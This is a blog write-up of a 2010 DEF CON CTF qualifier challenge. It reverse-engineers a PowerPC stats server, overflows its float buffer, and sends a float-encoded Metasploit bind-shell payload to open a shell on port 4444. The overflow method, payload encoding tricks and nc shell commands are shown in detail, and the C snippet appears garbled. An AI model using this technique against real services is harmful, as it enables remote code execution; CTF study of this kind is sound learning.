I’ll take Pwtent Pwnables for 400 please, Alex

May 26, 2010

This past weekend, I participated in my first ever DEF CON Capture the Flag Qualifying Tournament. CTF is a contest at the aforementioned annual hacker conference where the goal is to keep your team’s network services (which are on a closed intranet) up and running for as much as possible, while simultaneously trying to bring down your opponents’ network services. The qualifying tournament is an open tournament to determine the special few who will get to play CTF.

The categories in this year’s quals were Persuits Trivial, Crypto Badness, Packet Madness, Binary L33tness, Pwtent Pwnables, and Forensics, laid out in a Jeopardy!-style grid. There were 5 challenges in each category, worth 100 through 500 points respectively. I spent a fair amount of time working on Pwtent Pwnables (note that this contest was a team contest), and though I didn’t solve it during the contest, I managed to get a working exploit after the contest ended. Here’s a writeup of my work.

For this problem, you’re given this file and told that it’s running on pwnie.ddtek.biz. Go.

A quick file(1) says that this is a Mach-O executable ppc. strings(1) suggests that it’s binding to a port and listening on a socket. It receives some floating-point numbers, computes the average and standard deviation of those numbers, and sends the results back. The text includes “max of 16”, suggesting an obvious buffer overflow attack.

Let’s take a look at the disassembly and see what we can figure out. Fire up objdump, part of the binutils distribution:

$ objdump -d pp400_8c9d628d2144bbe8b.bin -s > pp400.s

Hmm. Not a lot to work with here. No symbols, and the convoluted dynamic linking makes it extremely difficult to even see what the calls to dynamically linked functions are. Here’s what the stub for calling fork(2) looks like:

    3d80:   7c 08 02 a6     mflr    r0
    3d84:   42 9f 00 05     bcl-    20,4*cr7+so,3d88 
    3d88:   7d 68 02 a6     mflr    r11
    3d8c:   3d 6b 00 00     addis   r11,r11,0
    3d90:   7c 08 03 a6     mtlr    r0
    3d94:   85 8b 03 18     lwzu    r12,792(r11)
    3d98:   7d 89 03 a6     mtctr   r12
    3d9c:   4e 80 04 20     bctr

Can you tell that’s a fork? I sure can’t. The bcl grabs the current instruction address (0x3d88), and then after some bookkeeping, the value at address 0x3d88+0x792 is loaded and then branched to. The memory at 0x40a0 is in the data segment in a stream of .long 0x2428, which presumably get replaced at load time with the actual addresses of the dynamically linked functions. How exactly that works, though, is still a mystery to me.

Disassembling it isn’t all that helpful right now, so maybe we can try running it to figure out what it does. I don’t have a PowerPC Mac, but thanks to Rosetta, I can run the program seamlessly on my x86 Mac:

$ chmod a+x pp400_8c9d628d2144bbe8b.bin
$ ./pp400_8c9d628d2144bbe8b.bin
pp400_8c9d628d2144bbe8b.bin: drop_privs failed!
: Operation not permitted

Well drat. It looks like it’s trying to drop privileges (a standard procedure to minimize risk in socket-based applications), but it’s failing somehow. What’s it trying to do? Let’s see with ktrace (aside: DTrace is far superior to ktrace but only available on OS X v10.5 and up; if you’re still running 10.4 like I am, then ktrace is your best option).

$ ktrace ./pp400_8c9d628d2144bbe8b.bin
pp400_8c9d628d2144bbe8b.bin: drop_privs failed!
: Operation not permitted
$ kdump | less

Looking through the log, we see calls to socket(2), setsockopt(2), bind(2), and listen(2), a standard sequence for a simple server. The problem failure here is coming from a call to setgroups(2) and setgid():

  8972 pp400_8c9d628d21 CALL  setgroups(0x1,0xb7fff958)
  8972 pp400_8c9d628d21 RET   setgroups -1 errno 1 Operation not permitted
  8972 pp400_8c9d628d21 CALL  setgid(0x1f8)
  8972 pp400_8c9d628d21 RET   setgid -1 errno 1 Operation not permitted

Well hmph, I’m stumped. The man pages here (and yes I realize I’m mixing links to the Linux and OS X man pages; it doesn’t really matter, they say mostly the same things since this is all POSIX) say that setgroups() will only succeed if run as root, and setgid() can only do trivial things as non-root. I’m definitely not going to run this as root, and the contest server sure as hell won’t be running as root.

At this point, I cheated (sort of). I noticed that this program was doing essentially the same things as an earlier problem in the contest, namely pp100. That problem was a program which also ran a server of sorts, but it was an ELF for FreeBSD. The difference there was that it included some sort of symbols in it, so disassembling it was incredibly helpful: there were useful function names, and it was obvious which system calls were being made and where. And in that program, I noticed that it was grabbing a username (digger) out of the data segment and calling drop_privs_user() with that username.

Armed with that knowledge and taking another look at the data segment of pp400, we see the string “luser” near the beginning. That looks promising. So, create a new user on your Mac named luser and try again.

Nope, same error. Maybe if we try running the program as luser?

$ su luser
$ ./pp400_8c9d628d2144bbe8b.bin

Success! It’s now listening on a socket. But on what port? lsof(8) to the rescue!

lsof -i  # Must be run as luser (or as root)
pp400_8c9 9254 luser    4u  IPv4 0x689bc9c      0t0  TCP *:nettest (LISTEN)

It’s listening on the nettest port; if we grep for that in /etc/services, we find that that corresponds to port 4138. So let’s try that out:

telnet localhost 4138
Trying ::1...
telnet: connect to address ::1: Connection refused
Connected to localhost.
Escape character is '^]'.
Send me some floats (max of 16), I will tell you some stats!
1 2 3^D
The average of your 3 numbers is 2.000000
The standard deviation of your 3 numbers is 0.816497
Connection closed by foreign host.

It took a bit of experimentation, but I eventually figured out that the server didn’t compute and return results unless you sent a literal ^D (EOF) character. Let’s send a gazillion numbers and see what happens:

$ python -c 'print " ".join(map(str, range(10000))), "\4"' | nc localhost 4138
Send me some floats (max of 16), I will tell you some stats!

Yep, it crashed all right. Now let’s exploit it. The first step is figuring out where in memory the buffer of floats is being stored. Normally we could just attach a debugger and figure it out, but debugging a process running Rosetta is not trivial. Fortunately, it is possible—a little googling leads one to this blog post and the Universal Binary Programming Guidelines, which detail the procedure. Run the binary with the OAH_GDB environment variable set, and then in another shell, run gdb --oah, attach to the process, and continue:

# First shell
$ OAH_GDB=YES ./pp400_8c9d628d2144bbe8b.bin
Starting Unix GDB Session

# Second shell (must be luser or root)
$ gdb --oah
(gdb) attach pp400_8c9d628d21.9453
(gdb) c

Unfortunately, it seems that the follow-fork-mode option for GDB does not work on OS X, so if you attempt to set it, you’ll find that you’re still attached to the parent process regardless of its setting. But fortunately, if the child process crashes, gdb still manages to halt when the crash occurs and inspect the program state. Run the earlier Python one-liner to crash the child process:

Program received signal SIGSEGV, Segmentation fault.
0x000033f8 in ?? ()
(gdb) disas $pc-20 $pc+20
Dump of assembler code from 0x33e4 to 0x340c:
0x000033e4:     lfs     f0,128(r30)
0x000033e8:     rlwinm  r2,r0,2,0,29
0x000033ec:     addi    r0,r30,56
0x000033f0:     add     r2,r2,r0
0x000033f4:     addi    r2,r2,8
0x000033f8:     stfs    f0,0(r2)
0x000033fc:     lwz     r2,60(r30)
0x00003400:     addi    r0,r2,1
0x00003404:     stw     r0,60(r30)
0x00003408:     addi    r0,r30,128
End of assembler dump.
(gdb) p/x $r2
$1 = 0xc0000000
(gdb) p/x $sp
$2 = 0xbffff400
(gdb) x/32x $r2-128
0xbfffff80:     0x44340000      0x44344000      0x44348000      0x4434c000
0xbfffff90:     0x44350000      0x44354000      0x44358000      0x4435c000
0xbfffffa0:     0x44360000      0x44364000      0x44368000      0x4436c000
0xbfffffb0:     0x44370000      0x44374000      0x44378000      0x4437c000
0xbfffffc0:     0x44380000      0x44384000      0x44388000      0x4438c000
0xbfffffd0:     0x44390000      0x44394000      0x44398000      0x4439c000
0xbfffffe0:     0x443a0000      0x443a4000      0x443a8000      0x443ac000
0xbffffff0:     0x443b0000      0x443b4000      0x443b8000      0x443bc000

What happened here is we walked off the stack: we just kept copying into the stack buffer all the way up the stack, which started at 0xbffffffc. We can clearly see the increasing set of floating-point numbers filling the end of the stack. Using this handy dandy IEEE 754 calculator, we see that 0x44340000 is the float 720, which means the buffer started at 0xbfffff80 – 720*4 = 0xbffff440, which at this point is $sp+0x40.

To exploit this now, we need to put our payload on the stack and then overwrite a return address with the proper stack address so we jump into the payload. We also can’t write more than about 751 numbers, since we’d crash before we got to the payload as we did just here, but fortunately this isn’t a problem.

Now let’s figure out in the payload the stack address needs to go. Restart the server, reattach gdb, and rerun the Python one-liner with only 100 numbers instead of 10000. The result:

Program received signal SIGSEGV, Segmentation fault.
0x41d00000 in ?? ()

The program counter ended up at 0x41d00000, which is the float 26. So, we need to place our pointer into the payload in the 27th number; the first 26 can be anything.

For the payload itself, start with the osx/ppc/shell_bind_tcp payload from Metasploit:

$ msfconsole
msf > use osx/ppc/shell_bind_tcp
msf payload(shell_bind_tcp) > generate -t c
 * osx/ppc/shell_bind_tcp - 224 bytes
 * http://www.metasploit.com
 * AutoRunScript=, AppendExit=false, PrependSetresuid=false, 
 * InitialAutoRunScript=, PrependSetuid=false, LPORT=4444, 
 * RHOST=, PrependSetreuid=false
unsigned char buf[] = 

We can’t just send the payload as-is, though. We have to send it as floats which then get sscanf’ed into the raw binary. So we need to take the payload, group it into 4-byte units, convert those to floats, and print those out as strings, being careful that the resulting strings reconvert back properly. PowerPC instructions are fixed at 4 bytes, which is convenient in this case. I did that with this little C snippet:

void emit(unsigned int op)
  char buf[256];

    unsigned int op;
    float f;
  } u;

  float g;

  u.op = op;
  sprintf(buf, "%64.64f", u.f);
  if(sscanf(buf, "%f", &g) != 1 || g != u.f)
    printf("***BAD*** 0x%08x (%s)\n", u.op, buf);
    printf("%s\n", buf);

Trying it out, we see a couple of the opcodes from the payload don’t encode properly: 7fc3f378 (mr r3,r30) and 7fe00008 (trap). Why? Well, these correspond to encodings of NaN. If you try and sscanf back the string “nan”, you’re not going to get those values back.

Time to bust out the Power ISA. Let’s find some instructions we can replace those with that encode properly. We want to avoid any instruction that begins with the bits 011111111 or 111111111. After some perusing through the opcode maps, I found that “addi r3,r30,0”, encoded as 387e0000, would be a suitable replacement for “mr r3,30”, and “twi 15,r0,0”, encoded as 0de00000, would be a suitable replacement for “trap”. The trap instruction isn’t actually necessary, it’s just a safety in case the system call to exec() to execute the shell fails, but I decided to replace it anyways.

Throw in a standard nop sled, and we’re done! Here’s the final exploit code. Run as:

$ ./pp400-exploit | nc localhost 4138
Send me some floats (max of 16), I will tell you some stats!
The average of your 148 numbers is inf
The standard deviation of your 148 numbers is inf

# Open up a new shell and connect to the bind shell
nc localhost 4444
uid=504(luser) gid=504(luser) groups=504(luser)

Huzzah! We have a bind shell!

Now I mentioned earlier that I didn’t get around to solving this during the contest, so I don’t know if this exploit would have worked against the target machine. I do know, however, that since the PowerPC exploit worked flawlessly on my x86 Mac, it wouldn’t have mattered whether the target machine was actually PPC or x86 (though I did have to tweak the length of the nop sled and the buffer address to jump to until it worked, since the program has different behavior when running under the debugger and when not). Props to Rosetta for correctly translating code generated at runtime.

And that, my friends, is an anatomy of an exploit.

You could have done all that, or you could have realized that this problem was identical to pp400 from last year. I of course didn’t realize this since I didn’t compete last year, but one of my teammates pointed this out to me (yet somehow I lost the motivation to keep working on this problem…). That unofficial writeup to which I just linked was taken down during the contest, presumably because the writers were competing again and didn’t want to give other teams an advantage, though my teammate had a copy of the text. In any case, I still had fun solving this.

Comments are closed.